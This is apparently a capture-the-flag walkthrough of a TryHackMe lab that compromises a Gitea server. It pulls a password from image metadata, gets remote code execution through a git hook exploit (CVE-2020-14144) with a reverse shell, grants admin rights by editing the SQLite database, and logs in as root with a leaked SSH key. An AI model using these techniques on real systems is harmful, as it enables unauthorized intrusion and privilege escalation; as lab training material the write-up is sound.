- Room link: https://tryhackme.com/room/gitandcrumpets
Nmap
Let’s see what we are working with here.
Nmap scan report for git.git-and-crumpets.thm (10.10.255.148)
Host is up (0.022s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp closed zeus-adminI see git.git-and-crumpets.thm and git-and-crumpets.thm in the nmap output.
Let's add them to our /etc/hosts file
sudo nano /etc/hostsPort 80
Visiting the main website page, instantly redirects us to a Rick Astley video (we do love our Rick). After having added the new hosts to the host file, I can now see the real page…
Let’s make an account and have a look around the system.
After making the new account login. When you get there you will notice a few repos in Explore tab.
Checking the repo and its commits, we can see 5 changes. Let’s review them.
Now knowing the users password is in the image, let's get it.
curl http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d -s | strings -n 8 | headResult
8tEXtDescription
My 'Password' should be easy enough to guess
E7V:W*555}Next, we need to find his email, luckily it's on the main profile for the user.
User
Let's log in as the new user, then check if he has any higher privileges.
Yes, Githooks are available. This will allow us to execute code on a successful change to the repo.
More info here: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
Edit the page above with a bash shell to your machine.
Then update the hook script to save it. Now edit the readme.md file with any change to get our hook to fire and get a shell.
We can grab the flag in the home folder. (/home/git)
It's abse64 encoded, so decode it. If you forget …
echo dGhte2ZYzZDZhYTE2fQ=|base64 -dRoot
Let’s now look around the system for any gitea related files (database, config etc)
find / -type f 2>/dev/null | grep "gitea" | grep "db"/var/lib/gitea/data/gitea.db << Looks like what we need!! /var/lib/gitea/data/gitea-repositories/root/backup.git/objects/05/2db66e7afb93b756a8fd79b1d794299e40a684
/var/lib/gitea/data/gitea-repositories/scones/cant-touch-this.git/objects/7a/8cad890480058860f42788db193afa38182cb6
/var/lib/gitea/data/queues/push_update/000002.ldb
/var/lib/gitea/data/queues/notification-service/000002.ldb
/var/lib/gitea/data/queues/repo_stats_update/000002.ldb
/var/lib/gitea/data/queues/pr_patch_checker/000002.ldb
Now change to the directory. Running file /var/lib/gitea/data/gitea.db
Shows us this is an SQlite3 database.
sqlite3 gitea.db- SQlite3 Basic Cheatsheet
sqlite> .database #List database
slqite> .tables #List tables
sqlite> .scheme user #List schema of the table users
sqlite> .mode column #Set mode to column
sqlite> .mode tab
sqlite> .mode line #Set mode to line - my preffered here.
sqlite> .width 10 25 3 6 15 #Set width of column
sqlite> .show #Show column settingsAfter listing the tables, seeing a user table, let's get the data. Trying the crack the passwords was taking a really long time, so I opted to edit the user we had access to. Giving him admin access via the sqlite database.
UPDATE user SET is_admin=1 WHERE id=3;Going back to the application we now see a new repo.
Looking at the branches, we can see a new file dotfiles
With old commits, one, in particular, looks very interesting.
An ssh key!!
Copying the contents to a new file and making it executable. Then using the “password” from the file name. We can now access SSH and get the last flag.
nano id_rsa #copy contents in
chmod 600 id_rsa
ssh root@git-and-crumpets -i id_rsa
Now we got the last flag and owned the box!
